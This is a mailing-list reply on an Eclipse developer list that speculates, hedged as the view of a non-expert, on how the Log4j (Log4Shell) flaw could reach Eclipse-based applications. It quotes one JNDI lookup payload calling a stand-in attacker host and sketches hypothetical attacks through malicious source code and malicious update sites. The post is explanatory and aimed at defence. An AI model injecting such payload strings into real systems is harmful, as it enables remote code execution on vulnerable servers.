Skip to main content
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] [List Home]
Re: [cross-project-issues-dev] log4j vulnerability in Eclipse?
I want to contribute to this discussion my understand on how an attack on an Eclipse based application could be performed in practice. My understanding is mostly based on [1], [2] and [3].
(My understanding is only based on a causal reading on the published material, and I am by no beans a an expert in computer security, so please don't place to much trust in this analysis!)
The Eclipse platform itself doesn't seem to be vulnerable (judging from earlier messages in this thread) so this might be mostly theoretical, but might be interesting nevertheless. There might be third party Eclipse applications that are affected.
My understanding is that this vulnerability affects code that uses user submitted data in log messages. When messages of the following form is logged it can make Log4J download and execute arbitrary code: "${jndi:ldap://attacker.com/a}";. Let's call such log messages "bad log strings".
This is more of a problem for web server applications than for desktop applications like Eclipse. Web server applications might be attacked if they log uses names or user agent strings. Attackers can actively seek out and target vulnerable applications.
Desktop application that act as web clients can also be attacked, but they probably pose harder targets. Attackers have to somehow trick users to connect to malicious services and download malicious data.
The following are two situation that I came up with which could potentially trigger the vulnerability in the Eclipse IDE (if it were vulnerable, which is probably not the case):
* The users downloads malicious source code and compiles it using Eclipse. During compilation Eclipse might log some data about the source code which contain a bad log string.
* The user connects to a malicious software update site. Some data about the site, for example its name, contains a bad log string. Eclipse logs this data and triggers the vulnerability.
Again I want to stress the fact that it doesn't seem like the Eclipse platform itself is vulnerable or distributes any version of Log4J which are vulnerable. 

BR,
Jens Lideström
[1]: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit 

[2]: https://www.lunasec.io/docs/blog/log4j-zero-day/

[3]: https://github.com/christophetd/log4shell-vulnerable-app

Back to the top